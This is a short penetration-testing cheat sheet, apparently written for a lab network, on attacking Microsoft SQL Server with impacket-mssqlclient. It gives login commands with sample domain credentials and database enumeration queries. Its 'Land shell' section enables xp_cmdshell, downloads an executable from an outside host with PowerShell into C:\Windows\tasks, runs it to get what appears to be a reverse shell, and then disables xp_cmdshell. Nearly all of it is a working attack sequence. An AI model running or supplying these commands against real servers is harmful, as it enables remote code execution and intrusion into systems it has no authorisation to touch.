impacket-mssqlclient

Connect

impacket-mssqlclient -windows-auth rastalabs.local/joe:'Password123'@10.10.122.15

impacket-mssqlclient corp.local/[email protected] -windows-auth
Password123

Make sure to clarify domain, mssqlclient otherwise will let you login, but some commands will be broken, strange issue

Gather some basic info

SELECT name FROM sys.databases;
use umbraco;
SELECT * FROM INFORMATION_SCHEMA.TABLES;

Land shell

enable_xp_cmdshell
xp_cmdshell powershell.exe wget http://10.10.123.110:7777/revpf.exe -OutFile C:\Windows\tasks\revpf.exe
xp_cmdshell C:\Windows\tasks\revpf.exe
disable_xp_cmdshell

Last updated 1 year ago